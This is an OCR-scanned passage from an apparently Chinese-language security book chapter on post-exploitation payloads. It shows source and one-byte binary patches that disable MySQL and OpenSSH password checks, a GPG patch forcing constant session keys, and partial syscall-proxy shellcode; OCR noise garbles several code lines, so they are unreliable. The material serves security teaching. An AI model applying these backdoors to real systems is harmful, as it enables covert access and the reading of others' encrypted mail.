通过 认证 。 这 样 的 话 ， 攻 击 者 在 不 知道 用 户 密码 的 情况 下 ， 就 能 通过 MySQL 认 证 ， 从 而 以 合法 


的 远程 用 户 身份 访问 MySQL 服 务 器 。 


再 强调 一 下 ， 这 仅 在 特殊 情形 下 才 有 用 ， 特 别 适用 于 以 下 情形 : 


a 在 系统 中 安置 巧妙 的 后 门 ; 


O 利用 应 用 程序 / 守护 程序 的 能 力 解释 一 组 复杂 的 数据 ; 


O 不 动 声色 地 破解 系统 。 


除了 修改 安全 信道 的 安全 属性 外 ， 偶 尔 使 用 合法 信道 可 能 会 更 好 一 些 。 在 SQL Server 的 例子 
中 ,我 们 虽然 作为 普通 用 户 与 系统 交互 ， 但 只 要 这 个 补丁 起 作用 ， 我 们 就 可 以 访问 和 修改 任何 数 
据 。 如 果 精 心 构造 攻击 行为 ， 数 据 库 日 志 显 示 的 将 是 普通 用 户 在 进行 正常 操作 。 尽 管 如 此 ，root 


shell 通 常 还 是 更 有 效 一 些 〈 尽 管 算 不 上 很 巧妙 )。 


下 文 的 讨论 需要 读者 有 MySQL 源 码 ， 可 以 从 www.mysql.com 下 载 。 在 写 这 本 书 的 时 候 ， 


MySQL 的 稳定 版 本 是 4.0.14b。 


MySQL 使 用 了 稍微 有 点 奇怪 的 自家 设计 的 认证 机 制 ， 包 括 下 面 的 协议 《用 于 远程 认证 ): 


口 客户 端 建立 TCP 连 接 ; 

口 服务 器 发 送 标题 (banner) 和 8B 询 问 (challenge); 
a 客户 端 用 自己 的 密码 散 列 〈8B) 编码 这 个 询问 ; 
Q 客户 端 把 编码 后 的 数据 发 给 服务 器 ; 
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a 服务 器 用 sal\passwordq.c 里 的 check_scramble 函 数 检查 编码 后 的 数据 ; 

a 如 果 编 码 后 的 数据 符合 服务 器 的 期 望 ，check_scrambe1 返 回 0; 否则 ，check_scramble 
返回 1。 

与 check_scramble 相 关 的 代码 段 如 下 : 


while (*scrambled) 
{ 


if (*scrambled++ != (char) (*to++ ^ extra) ) 
return 1; /* Wrong password */ 
} 
return 0; 


因此 ， 我 们 的 补丁 很 简单 ， 如 果 把 代码 段 改 成 : 
while (*scrambled) 
{ 


if (*scrambled++ != (char) (*to++ ^ extra)) 
return 0; /* Wrong password but we don't care :o) */ 
H 
return 0; 


那么 用 户 就 可 以 用 任何 密码 进行 远程 访问 。 

你 可 以 利用 MySQL 做 很 多 其 他 的 事情 , 包括 像 SQL Server 例 子 那样 的 补丁 ( 它 不 在 乎 你 是 谁 ， 
你 总 是 dbo) 或 者 其 他 有 趣 的 事情 。 

这 段 代 码 编译 成 与 下 面 类 似 的 字 节 序 (使 用 微软 汇编 格式 ): 


3B C8 cmp ecx,eax 
74 04 je (4 bytes forward) 
BO O1 mov al,1 

EB 04 jmp (4 bytes forward) 
EB C5 jmp (59 bytes backward) 
32 CO xor al,al 


mov al,1 是 整个 问题 的 关键 ， 如 果 我 们 把 它 改 成 mov al,0， 任 何 用 户 都 可 以 用 任何 密码 远程 
访问 服务 器 。 这 就 是 所 谓 的 1B 补 本 (如果 比较 教条 ， 也 可 以 说 是 1 位 补丁 )。 如 果 我 们 做 过 试验 ， 
就 会 知道 不 可 能 对 进程 做 更 少 的 改动 了 ， 但 是 我 们 已 经 禁止 了 整个 远程 密码 认证 机 制 。 

在 目标 系统 上 应 用 二 进 制 补丁 的 方法 作为 练习 留 给 读者 。MySQL 在 过 去 出 现 过 许多 允许 执 
行 任 意 代 码 的 漏洞 ， 毫 无 疑问 的 是 迟早 会 发 现 更 多 的 漏洞 。 即 使 缺少 好 用 的 缓冲 区 溢出 ， 这 个 技 
术 仍 可 以 用 于 二 进 制 文件 修补 ， 因 而 仍然 值得 了 解 。 

-你 可 以 编写 一 个 小 的 破解 载荷 ， 用 与 前 面 介绍 的 SQL Server 破 解 类 似 的 方式 区 分 运行 中 的 代 

码 或 者 二 进 制 文件 。 
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: 这 里 讨论 的 原理 几乎 可 以 用 于 任何 认证 机 制 , 再 以 OpenSSH 的 RSA 认 证 机 制 为 例 , 看 是 否 如 
我 们 推测 的 那样 。 在 源码 中 搜 了 一 会 儿 ， 我 们 发 现 了 如 下 的 函数 : 
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int 
auth_rsa_verify_response (Key *key, BIGNUM *challenge, u_char response[16]) 
{ 

u_char buf[32], mdbuf[16]; 

MD5_CTX md; 

int len; 


/* don't allow short keys */ 
if (BN_num_bits(key->rsa->n) < SSH_RSA_MINIMUM_MODULUS_SIZE) { 
error("auth rsa verify response: RSA modulus too small: %d < 





minimum %d bits", . 
BN num bits(key-»rsa-»n), SSH RSA MINIMUM MODULUS SIZE); 
return (0); 


} 


/* The response is MD5 of decrypted challenge plus session id. */ 
len = BN_num_bytes (challenge); 
if (len <= 0 || len > 32) 
fatal("auth rsa verify response: bad challenge length %d", len); 
memset(buf, 0, 32); 
BN bn2bin(challenge, buf + 32 - len); 
MD5 Init(&md); 
MD5, Update(&md, buf, 32); 
MD5 Update(&md, session id, 16); 
MD5 Final(mdbuf, &md); 


/* Verify that the response is the original challenge. */ 
if (mememp(response, mdbuf, 16) != 0) { 

/* Wrong answer. */ 

return (0); 
} 


/* Correct answer. */ 
return (1); 


} 

可 以 很 容易 再 找 出 类 似 的 函数 ， 它 根据 认证 的 成 功 与 否决 定 返回 1 或 0。 然 而 ， 在 OpenSSH 
例子 里 ， 因 为 它 是 通过 派生 子 进程 来 执行 认证 的 ， 所 以 我 们 只 能 修改 磁盘 上 的 二 进 制 文件 。 尽 管 
如 此 ， 用 return 1 语句 替换 return 0 语句 之 后 ， 你 可 以 以 任意 用 户 的 身份 用 任意 密码 访问 SSH 
服务 器 。 


22.5 ”其 他 运行 时 修补 方法 


安全 著作 鲜 有 提 及 运行 时 修补 的 技术 ,可 能 是 因为 根 shell 更 有 效 ， 也 可 能 是 因为 编写 运行 时 
修补 的 破解 比较 麻烦 (或 者 是 作者 对 此 缺乏 了 解 )。 

Code Red 虹 虫 的 破解 代码 使 用 了 简单 的 运行 时 修补 技术 ， 它 〈 间 拘 式 地 〉 把 [IS 里 的 
Tcpsocksend 函 数 输入 表 入 口 重 新 映射 到 蠕虫 载荷 内 的 地 址 , 蠕虫 内 部 对 应 的 函数 返回 的 不 是 用 
户 所 期 望 的 内 容 。 确 定 改写 哪个 文件 的 逻辑 可 能 很 复杂 ， 即 使 运行 IS 服 务 的 账号 可 以 写 这 些 文 
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件 ， 也 不 好 确定 到 底 该 改写 哪 一 个 。Code Red 还 有 一 个 有 趣 的 特性 (被 大 多 数 使 用 运行 时 修补 的 
破解 借用 ) 是， 进程 一 旦 停止 或 重启 后 ， 就 不 存在 被 跟踪 的 危险 了 。 

当 运 行 时 修补 在 内 存 中 消失 时 ， 对 攻击 者 来 说 ， 既 是 祝福 也 是 诅咒 。 在 各 种 UNIX 平 台 上 ， 
最 常见 的 是 有 一 个 工作 进程 (worker processes) W, 它 负 责 处 理 来 自 客户 端的 大 量 请 求 然 后 终止 。 
例如 ，Apache 就 是 这 种 情况 。 运 行 时 修补 破解 在 这 里 稍微 改进 了 一 下 行为 ， 因 为 你 修补 的 服务 器 
实例 代码 可 能 不 会 存在 得 太 久 。 

对 攻击 者 来 说 ,最 坏 的 情形 是 每 个 服务 器 实例 只 处 理 一 个 客户 端 请 求 , 这 意味 着 运行 时 补丁 
对 随后 的 请 求 不 起 作用 。 从 攻击 者 的 观点 来 看 ， 有 工作 进程 池 意 味 着 攻击 者 犯罪 的 证 据 几 乎 可 以 
立即 被 清除 。 

除了 修改 程序 的 认证 / 授权 组 件 外 ， 运 行 时 修补 还 有 一 些 更 隐蔽 的 作用 。 

几乎 每 个 安全 程序 都 在 一 定 程度 上 依赖 密码 机 制 , 而 每 个 密码 机 制 几乎 都 在 一 定 程度 上 依赖 
强 随机 性 。 对 破解 而 言 ， 修 补 随机 数 生成 器 可 能 并 不 使 人 感到 震 憾 ， 但 结果 却 非常 严重 。 

弱 随 机 性 修补 技术 可 以 用 于 降低 目标 系统 的 加 密 强 度 。 有 时 候 ， 弱 随机 性 补丁 允许 使 认证 协 
议 及 加 密 失 效 ; 在 某 些 使 用 〈 当 前 ) 随机 询问 的 系统 中 ， 如 果 用 户 可 以 确定 当前 的 值 ， 将 通过 认 
证 。 如 果 你 已 经 知道 这 个 当前 的 值 , 就 可 以 轻松 炊 骗 认证 系统 ,例如 , 在 前 面 介绍 的 OpenSSH RSA 
例子 里 ， 注 意 下 面 这 行 : 

/* The response is MD5 of decrypted challenge plus session id. */ 

如 果 预 先知 道 目标 系统 使 用 什么 询问 , 那么 不 需要 私 钥 就 可 以 提供 正确 的 响应 。 无论 这 使 认 
证 机 制 失效 还 是 不 依靠 协议 了 ， 它 的 确 使 我 们 领先 一 步 。 

在 传统 加 密 软 件 里 也 可 以 发 现 这 样 的 例子 。 例 如 ， 如果 你 用 这 种 技术 修补 某 和 人 的 GPG 或 PGP 
程序 ， 使 他 的 消息 session key 总 是 常量 ， 那 么 你 就 能 轻松 打开 那个 人 发 送 的 任何 电子 邮件 了 。 当 
然 ， 前 提 是 你 必须 能 截获 这 些 电子 邮件 。 尽 管 如 此 ， 通 过 对 例 程 做 较 小 的 改变 ， 我 们 仍 可 以 削弱 
整个 加 密 机 制 所 提供 的 保护 。 

下 面 通过 一 个 快速 易 懂 的 例子 来 看 看 怎样 修补 GPG 1.2.2 来 削弱 其 随机 性 。 


GPG 1.2.2 随机 性 补丁 
下 载 GPG 的 源码 后 ， 我 们 开始 寻找 session key， 一 会 就 找到 了 make_session key. iX 
函数 调用 randomize_buffer 函 数 设 置 关键 位 。randomize buffer 调 用 get random_bits 函 数 ，get ran- 
dom bits 函 数 又 仿效 调用 read pool 函数 〈 因 为 只 允许 get random bits 调 用 read_pool， 上 所 以 我 们 不 
必 担 心 它 把 程序 的 其 他 部 分 弄 乱 了 )。 通 过 阅读 read_pool 代 码 ， 我 们 发 现 了 从 池 里 读 取 随机 数 然 
后 放 到 目的 缓冲 区 的 这 段 代 码 。 
/* read the required data 
* we use a readpointer to read from a different position each 
* time */ 
while( length-- ) ( 
*buffer++ = keypool [pool_readpos++]; 
if( pool readpos >= POOLSIZE ) 
pool readpos - 0; 
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pool_balance--; 


} 
因为 poo1_readpos 是 静态 变量 ， 我 们 可 能 想 维护 它 的 状态 ， 于 是 做 了 如 下 修补 : 


/* read the required data 
* we use a readpointer to read from a different position each time */ 
while( length-- ) { 
*buffert+ = 0xc0; pool_readpos++; 
if( pool_readpos >= POOLSIZE ) 
pool_readpos = 0; 
pool. balance--; 


) 
修补 后 的 二 进 制 文件 用 国定 的 session key 加 密 每 条 消息 (不 论 它 使 用 哪 种 算法 )。 


226 上载 和 运行 (或 proglet* 服 务 器 ) 


一 类 有 趣 的 可 选 载荷 是 ， 启 用 一 个 循环 ， 接 收 shellcode， 然 后 运行 它 ， 保 持 这 个 循环 永 不 间 
断 。 通 过 这 个 方法 , 你 可 以 根据 具体 情况 用 不 同 的 小 破解 代码 片段 快速 且 适 度 地 重复 打击 服务 器 。 
术语 proglet 用 于 描述 这 类 小 程序 。proglet 被 定义 为 “不 经 过 仔细 考虑 编写 的 代码 ， 不 需要 任何 编 
辑 ， 第 一 次 就 能 正确 运行 "(依据 这 个 定义 ， 作 者 的 汇编 器 proglet 很 少 有 超过 几 行 指令 的 )。 

proglets 存 在 的 问题 如 下 。 

(1) proglet 昌 然 很 小 ， 但 写 起 来 比较 麻烦 ， 因 为 需要 使 用 汇编 语言 。 

(2) 没有 一 般 的 机 制 来 确认 proglet 的 成 功 与 否 ， 更 别 说 从 它们 接收 简单 的 输出 数据 了 。 

(3) 如 果 proglet 出 毛病 了 ， 恢 复 起 来 可 能 非常 麻烦 。 

即使 有 上 述 问 题 ，proglet 机 制 与 一 次 性 静态 的 破解 相 比 ， 仍 有 所 改进 。 但 稍 长 一 些 更 灵活 的 
代码 可 能 会 更 好 一 些 ， 这 就 是 系统 调用 代理 了 。 


22.7 ”系统 调用 代理 


与 本 章 导读 部 分 的 注解 一 样 ， 如 果 你 看 过 很 多 shellcode 文 章 ， 你 会 发 现 大 量 的 shellcode 其 实 
都 非常 相似 ， 所 作 所 为 也 基本 类 似 。 

当 你 作为 攻击 者 在 使 用 shellcode 时 ， 经 常会 发 现 这 些 代 码 有 时 候 会 莫名 其 妙 地 拒绝 工作 。 这 
时 ， 最 好 的 解决 办 法 是 推测 问题 会 出 在 哪 ， 然 后 设法 绕 过 问题 ， 重 新 展开 工作 。 例 如 ， 如 果 你 反 
复 派 生 cmd .exe， 但 失败 了 ， 你 可 能 想 把 自己 的 cmq.exe 复 制 到 目标 主机 上 ， 并 设法 运行 它 。 或 
者 ， 你 可 能 想 改写 一 个 你 没有 权限 写 的 文件 ， 因 此 ， 你 可 能 首先 想到 提升 特权 。 或 者 ， 你 攻击 
chroot 代 码 时 因为 某 些 原因 失败 了 。 无 论 是 什么 问题 ， 其 解决 办 法 无 外 乎 是 把 各 种 汇编 片段 组 
装 成 我 们 需要 的 破解 代码 〈 当 然 ， 这 是 一 个 非常 痛苦 的 过 程 )， 或 者 找 一 些 现 成 的 方法 。 

然而 ， 在 shellcode 大 小 方面 ， 有 一 个 普通 、 简 练 且 有 效 的 解决 方案 一 一 系统 调用 代理 。 

Tim Newsham 和 Oliver Friedrichs 首 先 提 出 系统 调用 代理 的 概念 ，Core-SDI 的 Maximiliano 





QD 非常 简短 的 计算 机 程序 ， 主 要 做 短期 、 凤 时 之 用 。 一 一 译 者 注 
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Caceres 随 后 在 一 篇 精彩 的 论文 中 对 其 做 了 进一步 的 前 述 〈 见 www.coresecurity.comy/files/files/11/ 
SyscallProxying. pdf)。 系 统 调用 代理 是 破解 技术 之 一 ， 它 启用 循环 ， 以 攻击 者 的 名 义 调用 系统 调 
用 ， 并 返回 结果 。 表 22-1 显 示 了 它 是 如 何 工 作 的 。 


表 22-1 系统 调用 怎么 工作 




















时 B 客户 端 主机 系统 调用 stub 网 络 系统 调用 代码 
0 调用 系统 调用 stub 
1 为 了 在 网 络 上 传输 ， 
把 参数 打包 到 缓冲 区 
2 传输 数据 
3 把 打包 后 的 参数 解压 
4 生成 系统 调用 
5 为 了 在 网 络 上 传输 ， 
把 结果 打包 
6 传输 数据 
7 把 结果 解压 ， 并 放 入 
系统 调用 返回 参数 里 
8 从 系统 调用 stub 中 返回 
9 解释 结果 
10 生成 其 他 的 系统 调用 


虽然 系统 调用 代理 未 必 行 得 通 〈 主 要 是 它 要 依赖 目标 主机 的 网 络 位 置 )， 但 这 个 方法 非常 强 
大 ， 因 为 它 允 许 攻击 者 根据 目标 主机 的 情况 ， 再 决定 采取 相应 的 动作 。 回 忆 上 面 提 到 的 例子 ， 假 
设 我 们 攻击 Windows 系 统 时 ， 发 现 不 能 编辑 某 个 文件 。 于 是 ， 我 们 查看 当前 用 户 的 信息 ， 发 现 权 
限 太 低 , 而 且 这 台 主 机 存在 命名 管道 特权 提升 的 问题 。 因此 , 我 们 执行 激活 特权 提升 的 函数 调用 。 
He! 我 们 有 了 系统 特权 。 

更 常见 的 情况 是 ， 我 们 可 以 代理 运行 在 我 们 机 器 上 的 任何 进程 的 活动 ， 把 系统 调用 (在 
Windows 上 为 Win32 API 调 用 ) 重 定向 到 目标 机 器 上 执行 。 那 意味 着 我 们 可 以 有 效 地 通过 代理 运 
行 任何 工具 ， 相 关 的 一 部 分 代码 将 在 目标 主机 上 运行 。 

熟悉 RPC 的 读者 可 能 已 经 注意 到 系统 调用 代理 机 制 和 【更 普通 的 ) RPC 机 制 之 闻 很 相似 。 这 
不 是 一 种 巧合 ， 因 为 我 们 正在 利用 系统 调用 代理 做 包含 相同 询问 的 工作 。 事 实 上 ， 主 要 的 询问 是 
一 样 的 ， 即 编组 化 Cmarshalling) 9， 或 者 把 系统 调用 参数 数据 封装 成 一 种 形式 ， 在 这 种 形式 里 
可 以 很 容易 地 用 平坦 的 数据 流 表示 它 。 我 们 正在 做 的 实际 上 是 用 一 小 段 汇编 代码 实现 非常 小 的 
RPC 服 务 。 

实现 代理 本 身 有 两 种 不 同 的 方法 : 

a 转移 栈 ， 调 用 函数 ， 然 后 把 栈 转 回来 ; 

a 把 输入 参数 转移 到 连续 的 内 存 块 里 ， 调 用 函数 ， 然 后 把 输出 参数 转 回 来 。 








CO 数据 在 进程 、 线 程 之 间或 者 一 个 网 络 上 传送 之 前 ， 对 其 进行 的 结构 化 《标准 化 ) 处 理 过 程 称 为 编组 化 。 
一 一 译 者 注 
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第 一 种 方法 比较 简单 ， 因 此 比较 小 ， 也 容易 编写 ， 但 要 占用 较 多 的 带宽 〈 从 客户 端 到 服务 器 
端 间 的 输出 参数 数据 没有 转移 的 必要 )， 而 且 不 太 好 处 理 那 些 不 传 到 栈 上 的 返回 数据 (例如 
Windows GetLastError). 

第 二 种 方法 有 点 复杂 , BRERA Wh RF BY SY. IX PIER KR AE SE 
种 形式 指定 远程 主机 上 正在 访问 的 函数 原型 ， 以 便 客户 端 知道 发 送 什么 数据 。 代 理 本 身 在 输入 输 
出 参数 、 指 针 类 型 、 程 序 文字 等 之 间 也 必须 有 一 些 区 分 方法 。 对 熟悉 RPC 的 人 来 说 ， 这 看 起 来 有 
点 像 IDL。 


22.8 ”系统 调用 代理 的 问题 


系统 调用 代理 具有 非常 好 的 动态 性 , 但 也 有 一 些 问 题 。 在 以 下 这 些 特殊 的 情况 下 ， 这 些 问 题 
可 能 会 影响 我 们 在 某 种 情形 下 是 否 能 使 用 系统 调用 。 

(D) 工具 问题 。 根 据 实现 代理 的 方式 ， 在 使 用 正确 整理 (marshal) 系统 调用 的 工具 时 ， 你 可 
会 碰 到 问题 。 

(2) 迭代 问题 。 每 个 函数 调用 都 需要 在 网 络 上 往返 传输 (数据 )。 对 于 包括 数 千 个 迭代 的 机 制 
来 说 ， 整 个 过 程 相当 乏味 ， 特 别 是 正在 攻击 的 目标 位 于 大 延迟 的 网 络 上 时 。 

(3) 并 发 问题 。 我 们 不 能 轻松 地 同时 做 多 件 事 情 。 

这 些 问 题 都 有 相应 的 解决 办 法 , 但 他 们 通常 都 涉及 某 些 工作 区 或 者 主要 的 体系 结构 决策 。 让 
我 们 看 一 下 这 3 个 问题 对 应 的 解决 办 法 。 

(1) 用 高 级 语言 编写 所 有 的 工具 ， 然 后 代理 所 有 的 由 那 种 语言 (可 以 是 Perl、Python、Java 或 
你 喜欢 的 其 他 语言 ) 的 解释 程序 所 生成 的 系统 调用 ,就 可 以 解决 问题 (1)。 这 个 解决 办 法 的 难点 在 
于 你 可 能 已 经 有 了 很 多 现成 的 工具 ， 但 它们 不 属于 同一 种 语言 ， 比 如 说 Perl。 

(2) 下 面 两 个 方法 都 可 以 解决 问题 (2)。 

Q 针对 需要 迭代 很 多 次 的 情形 ， 上 传代 码 并 执行 (看 22.6 节 )。 

Q) 把 类 似 的 解释 程序 上 传 到 目标 进程 ， 然 后 上 传 脚本 而 不 是 shellcode 片 段 。 

这 两 种 解决 办 法 实现 起 来 都 很 困难 。 

(3) 如 果 我 们 有 能 力 派生 另外 的 代理 ， 就 能 部 分 解决 问题 (3)}。 然 而 ， 我 们 不 可 能 那么 奢侈 。 
更 常见 的 解决 办 法 是 ， 我 们 的 代理 同步 访问 它 的 数据 流 ， 允 许 我 们 与 不 同 的 并 行 执行 线程 交互 。 
这 实现 起 来 有 些 棘 手 。 

尽管 有 这 些 缺 点 ， 系 统 调用 代理 仍 是 非常 灵活 的 、 破 解 shellcode 类 型 漏洞 的 方法 ， 非 常 值得 
一 试 。 期 望 在 未 来 的 两 三 年 里 能 看 到 大 量 基 于 系统 调用 代理 的 破解 代码 。 

BATA Windows 平台 设计 并 实现 一 个 小 的 系统 调用 代理 , 权 且 作为 一 个 有 意思 的 小 练习 。 选 
择 更 像 IDL 的 方法 ， 因 为 它 更 适合 Windows 函 数 调用 ， 在 规定 怎样 处 理 返回 数据 方面 可 能 对 我 们 
有 所 帮助 。 

首先 ， 我 们 需要 考虑 shellcode 将 怎样 为 生成 的 调用 解 开 〈unpackage) 参数 。 推 测 起 来 ， 我 们 
将 有 一 些 系 统 调 用 头 部 (header), 他 们 将 包含 鉴别 我 们 正在 调用 函数 的 信息 和 一 些 其 他 的 数据 (或 
许 是 标记 之 类 的 东西 ， 此 刻 就 不 要 自 寻 烦恼 了 )。 
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然后 会 得 到 一 个 参数 结构 列表 和 一 些 数据 。 或 许 还 可 以 放 一 些 标记 。 编组 后 的 函数 调用 数据 
如 表 22-2 所 示 。 
3R22-2 系统 调用 概述 








系统 调用 头 
DLLName 
FunctionName 
ParameterCount 
. .«some more flags». . . 
参数 列表 





. .«some flags». . . 
大 小 
数据 (如 果 参 数 是 “input” 或 “in/out”) 


解决 这 个 问题 较 容易 的 方法 是 找 出 我 们 将 生成 哪 种 调用 ,并 查看 一 些 参 数列 表 。 我 们 的 确 想 


创建 并 打开 文件 。 
HANDLE CreateFile( 
LPCTSTR lpFileName, // pointer to name of the file 
DWORD dwDesiredAccess, // access (read-write) mode 
DWORD dwShareMode, // share mode 


LPSECURITY ATTRIBUTES lpSecurityAttributes, 
// pointer to security attributes 


DWORD dwCreationDisposition, // how to create 
DWORD dwFlagsAndAttributes, // file attributes 
HANDLE hTemplateFile // handle to file with attributes to copy 


); 

得 到 一 个 指向 非 空 字符 终止 的 字符 串 《〈 可 能 是 ASCH 或 Unicode) 的 指针 ， 其 后 是 一 个 常量 
DWORD。 这 是 我 们 的 设计 面临 的 第 一 次 挑战 ， 我 们 必须 区 分 常量 〈 代 码 ) 与 引用 指向 代码 的 指 
针 )。 因 此 要 加 一 个 标记 来 区 分 指针 与 常量 。 我 们 准备 用 的 标记 是 IS_PTR。 如 果 标 记 被 置 位 ， 传 
递 给 函数 的 参数 应 该 被 看 作 指 向 数据 的 指针 而 不 是 常量 。 这 意味 着 在 调用 函数 之 前 ， 压 入 栈 上 的 
是 数据 的 地 址 而 不 是 数据 本 身 。 

同样 可 以 假设 我 们 将 传递 参数 列表 中 的 每 个 参数 的 长 度 , 那样 的 话 就 可 以 把 结构 作为 输入 传 
递 ， 就 像 传递 lpSsecurityattributes 参 数 那 样 。 

到 此 为 止 ， 除 数据 之 外 还 传递 了 ptz 标 记 和 数据 大 小 ， 已 经 可 以 调用 createFile 了 。 然 而 ， 
稍微 有 点 复杂 的 是 ， 我 们 可 能 要 用 某 种 方式 处 理 返 回 代 码 。 或 许 应 当 有 一 个 特殊 的 参数 列表 ， 由 
它 告诉 我 们 怎样 处 理 返 回 的 数据 。 

CreateFile 的 返回 代码 是 HANDLE〔 一 个 4B 无 符号 整数 )， 这 表示 返回 的 是 代码 而 不 是 指向 
代码 的 指针 。 但 这 里 有 个 问题 , 我 们 把 所 有 的 函数 参数 作为 输入 参数 , 仅 把 返回 值 作为 输出 参数 ， 
这 意味 着 除了 函数 的 返回 代码 之 外 不 能 返回 任何 其 他 的 数据 。 

创建 两 个 参数 列表 入 口 标记 就 可 以 解决 这 个 问题 。 
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O IS IN: 这 个 参数 作为 输入 传 给 函数 。 
a IS OUT 这 个 参数 保存 从 函数 返回 的 数据 。 
这 两 个 标记 也 适用 于 以 下 情形 : 有 一 个 来 自 函数 的 、 既 是 输入 又 是 输出 的 值 ， 例 如 下 面 原型 
里 的 lpcbData 参 数 o 
LONG RegQueryValueEx( 
HKEY hKey, // handle to key to query 


LPTSTR lpValueName, // address of name of value to query 
LPDWORD lpReserved, // reserved 











LPDWORD lpType, // addxess of buffer for value type 
LPBYTE lpData, // address of data buffer 
LPDWORD lpcbData // address of data buffer size 


); 
这 是 一 个 用 于 从 Windows 注 册 表 键 值 里 找 回 数据 的 Win32 API 函 数 。 在 输入 上 ，1lpcbpate 参 
数 指向 一 个 DWORD， 这 个 DORD 包 含 应 该 从 中 读 入 数值 的 数据 缓冲 区 的 长 度 ， 在 输出 上 ， 它 包含 
被 复制 到 缓冲 区 的 数据 的 长 度 。 
因此 ， 我 们 对 其 他 原型 也 做 了 快速 检查 。 
BOOL ReadFile( 
HANDLE hFile, // handle of file to read 
LPVOID lpBuffer, // pointer to buffer that receives data 
DWORD nNumberOfBytesToRead, // number of bytes to read 
LPDWORD lpNumberOfBytesRead, // pointer to number of bytes read 
LPOVERLAPPED lpOverlapped // pointer to structure for data 
); 
我 们 能 指定 一 个 任意 大 小 的 输出 缓冲 区 ， 其 他 参数 都 没有 麻烦 。 

这 个 方法 产生 的 效果 是 ， 当 调用 ReadFile 时 ， 我 们 把 参数 捆 在 一 起 ， 而 不 必 再 通过 网 线 发 
送 输入 缓冲 区 的 1000B 一 一 假定 我 们 有 一 个 大 小 为 1000B 的 Ts_ouT 参 数 一 一 我 们 只 用 发 送 $B 来 
读 1000B， 而 不 必 发 送 1005B。 

我 们 必须 若 苦 寻 况 一 个 不 能 用 这 个 机 制 调用 的 函数 .如果 函数 分 配 缓冲 区 并 返回 指向 已 分 配 
缓冲 区 的 指针 ， 那 可 能 会 有 问题 。 例 如 ， 假 设 我 们 有 一 个 像 下 面 这 样 的 函数 ， 

MyStruct *GetMyStructure(); 

此 刻 ， 我 们 可 以 通过 指定 返回 值 是 Ts_PTR 和 IS_ouT 〈 返 回 值 大 小 为 sizeof( struct 
MyStruct)) 来 处 理 这 个 问题 ， 那 就 会 得 到 返回 的 Mystruct 中 的 数据 ， 不 过 我 们 没有 这 个 结构 
的 地 址 ， 因 此 不 能 使 用 free ()。 

把 返回 的 返回 值 数据 拼凑 一 下 ， 以 便当 返回 一 个 指针 类 型 时 间 时 返回 常量 值 。 这 样 , 我 们 将 
总 是 为 常量 返回 代码 保留 额外 的 4B， 而 不 论 它 是 不 是 常量 。 

这 个 解决 办 法 处 理 了 大 部 分 情况 ， 但 还 有 些小 问题 。 考 虑 下 面 的 函数 ， 

char *asctime( const struct tm *timeptr ) 

asctime() 函 数 返回 非 空 字符 终止 的 字符 串 ， 它 的 最 大 长 度 是 24B。 为 任何 返回 的 非 空 字符 
终止 的 字符 串 缓冲 区 指定 一 个 返回 大 小 的 请 求 ,， 也 可 以 拼凑 返回 数值 。 但 在 带宽 占用 方面 不 是 很 


22.8 系统 调用 代理 的 问题 45] 


有 效 ， 于 是 ， 我 们 加 一 个 非 空 字符 终止 的 标记 IS_sz (这 个 数据 是 一 个 指向 非 空 字符 终止 的 缓冲 
区 的 指针 ) 以 及 双 非 空 字符 终止 的 标记 IS_szz (这 个 数据 是 指向 通过 两 个 空 字 节 终止 的 缓冲 区 
的 指针 ， 例 如 Unicode 字 符 串 )。 
需要 像 下 面 这 样 展 开 代 理 shellcode。 
(1) 得 到 包含 函数 的 DLL 名 称 。 
(2) 得 到 函数 名 称 。 
(3) 得 到 参数 的 数量 。 
(4) 得 到 我 们 不 得 不 为 输出 参数 保留 的 数据 量 。 
(5) 得 到 函数 标记 《调用 约定 等 )。 
(6) 得 到 参数 : 
© 得 到 参数 标记 (ptr, in, out, sz, szz); 
Q 得 到 参数 大 小 ; 
@ (if in or inout) 得 到 参数 数据 ; 
(Dif not ptr， 压 入 参数 ; 
@ if ptr， 压 入 指向 数据 的 指针 ; 
© 递减 参数 计数 ， 如 果 有 更 多 的 参数 ， 得 到 另外 的 参数 。 
(7) 调用 函数 。 
(8) 返回 'out ' 数 据 。 
现在 得 到 了 一 个 普通 的 shellcode 代 理 ， 它 几乎 可 以 处 理 全 部 的 Win32 API。 该 机 制 的 前 半 部 
分 很 好 地 处 理 了 返回 的 数据 ， 并 通过 应 用 in/out 的 概念 节约 带宽 。 后 半 部 分 是 我 们 必须 用 id1 类 型 
格式 《〈 这 实际 上 不 是 非常 难 ， 因 为 你 可 能 只 会 调用 40 或 50 个 函数 )， 为 每 一 个 我 们 想 调用 的 函数 
指定 原型 。 
下 面 的 代码 显示 了 了 略 做 删 减 的 shellcode 的 代理 部 分 。 有 趣 的 部 分 是 AsmDemarshall- 
andcal1。 手 动 建立 大 多 数 该 由 破解 代码 做 的 工作 一 一 得 到 Loaaribrary 和 GetProcAddress 的 
地 址 ， 把 ebx 设 为 指向 接收 数据 流 的 开始 处 。 


// rsc.c 
// Simple windows remote system call mechanism 


#include «windows.h» 
#include <stdio.h> 

#include <stdlib.h> 
#include <string.h> 


int Marshall( unsigned char flags, unsigned size, unsigned char *data, 
unsigned char *out, unsigned out_len ) 
{ 

out [0] = flags; 

*((unsigned *)(&(out[11))) = size; 

memcpy( &(out[5]), data, size ); 
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return size + 5; 


} 

LILLIE AA ELT ECL EL ATS 
// Parameter Flags ///////// 
Fg: gg gl Ig gout 


// this thing is a pointer to a thing, rather than the thing itself 
#define IS PTR 0x01 


// everything is either in, out or in | out 
#define IS IN 0x02 
#define IS OUT 0x04 


// null terminated data 
#define IS_SZ 0x08 


// null short terminated data (e.g. unicode string) 
#define IS SZZ 0x10 


[4L Ó480L VH 0HHga4H4440: 414 ]0 10101414 
// Function Flags ////////// 
[IHEBBGlyabeÁibkbftlfl M4 ATA ATA AT 


// function is | cdecl (default is __stdcall) 
#define FN CDECL 0x01 


int AsmDemarshallandCall( unsigned char *buff, void *loadlib, void *getproc ) 
{ 


// params: 
// ebp: dllname 


// +4 : fnname 

// +8 : num params 

// +12 : out param size 

// +16 : function flags 

// +20 : params_so_far 

// +24 : loadlibrary 

// +28 : getprocaddress 

// +32 : address of out data buffer 
asm 


// set up params - this is a little complicated 
// due to the fact we're calling a function with inline asm 


push ebp 
sub esp, 0x100 
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mov ebp, esp 

mov ebx, dword ptr[ebp+0x158]; // buff 
mov dword ptr [ebp + 12], 0; 

mov eax, dword ptr [ebp+0x15c)];//loadlib 
mov dword ptr[ebp + 24], eax; 

mov eax, dword ptr [ebp+0x160];//getproc 
mov dword ptr[ebp + 28], eax; 


mov dword ptr [ebp], ebx; // ebx = dliname 


sub esp, 0x800; // give ourselves some data space 
mov dword ptr[ebp + 32], esp; 


